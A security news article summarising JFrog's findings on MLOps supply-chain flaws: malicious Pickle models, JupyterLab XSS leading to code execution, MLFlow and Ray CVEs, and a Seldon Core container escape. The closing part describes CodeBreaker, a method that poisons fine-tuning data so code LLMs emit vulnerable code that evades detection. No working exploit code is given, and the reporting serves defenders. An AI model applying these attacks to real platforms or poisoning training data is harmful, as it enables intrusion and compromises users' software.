Researchers Discover More Than 20 Weaknesses in Supply Chain of MLOps Platforms

Researchers Identify Over 20 Supply Chain Vulnerabilities in MLOps Platforms

Security experts caution about the vulnerabilities in machine learning (ML) software supply chain as they have uncovered more than 20 weaknesses that could be exploited to target MLOps platforms.

Described as inherent and implementation-based flaws, these vulnerabilities could lead to serious outcomes, from executing arbitrary code to loading malicious datasets.

MLOps platforms empower users to plan and implement an ML model pipeline, with a model registry serving as a storage and versioning platform for trained ML models. These models can then be integrated into an application or accessed by other clients through an API (also known as model-as-a-service).

“Inherent vulnerabilities are issues stemming from the underlying formats and procedures utilized in the targeted technology,” mentioned JFrog researchers in a comprehensive report.

Some examples of inherent vulnerabilities involve exploiting ML models to execute the attacker’s chosen code by leveraging the models’ support for automatic code execution upon loading (e.g., Pickle model files).

This behavior extends to specific dataset formats and libraries that facilitate automatic code execution, potentially leading to malware attacks when loading a publicly available dataset.

Another example of an inherent vulnerability relates to JupyterLab (formerly Jupyter Notebook), a web-based interactive computational environment allowing users to run blocks (or cells) of code and view the results.

“One undisclosed issue is how HTML output is managed when executing code blocks in Jupyter,” pointed out the researchers. “The Python code output may include HTML and JavaScript which can be rendered by the browser.”

The issue here is that the executed JavaScript interacts with the web application without sandboxing, enabling the web application to execute arbitrary Python code.

Consequently, an attacker could introduce malicious JavaScript code to add a new cell in the current JupyterLab notebook, inject Python code, and execute it. This risk significantly increases when exploiting a cross-site scripting (XSS) vulnerability.

As a result, JFrog flagged an XSS flaw in MLFlow (CVE-2024-27132, CVSS score: 7.5) arising from inadequate sanitization when executing an untrusted recipe, leading to client-side code execution in JupyterLab.

“One of the critical lessons from our study is that all XSS vulnerabilities in ML libraries should be treated as potential arbitrary code execution, as data scientists may utilize these ML libraries with Jupyter Notebook,” stated the researchers.

The second category of weaknesses pertains to implementation flaws, such as inadequate authentication in MLOps platforms, potentially enabling a malicious actor with network access to exploit code execution capabilities by misusing the ML Pipeline functionality.

These threats are not hypothetical, with financially driven adversaries leveraging such vulnerabilities, as evidenced in the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), deployment for cryptocurrency mining.

Another implementation vulnerability is a container escape targeting Seldon Core, allowing attackers to move beyond code execution to traverse across the cloud environment and access other users’ models and datasets by uploading a malicious model to the inference server.

Chaining these vulnerabilities can not only facilitate infiltration and dissemination within an organization but also jeopardize servers.

“If you are implementing a platform that supports model serving, it should be noted that anyone capable of serving a new model can also execute arbitrary code on that server,” warned the researchers. “Ensure that the environment running the model is entirely isolated and fortified against a container escape.”

This revelation coincides with Palo Alto Networks Unit 42 outlining two rectified vulnerabilities in the LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467), capable of enabling attackers to execute arbitrary code and access sensitive data.

Recently, Trail of Bits also exposed four issues in Ask Astro, a retrieval augmented generation (RAG) open-source chatbot application, that could lead to chatbot output manipulation, inaccurate document ingestion, and potential denial-of-service (DoS).

As vulnerabilities are being uncovered in AI-powered applications, methods are being developed to contaminate training datasets to deceive large language models (LLMs) into generating vulnerable code.

“Unlike recent attacks that insert malicious payloads in discernible or irrelevant sections of the code (e.g., comments), CodeBreaker leverages LLMs (e.g., GPT-4) for sophisticated payload transformation (without affecting functionalities), ensuring that both the corrupted data for fine-tuning and generated code can bypass robust vulnerability detection,” explained a team of academics from the University of Connecticut.

Enjoyed this article? Connect with us on Twitter and LinkedIn for more exclusive updates.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts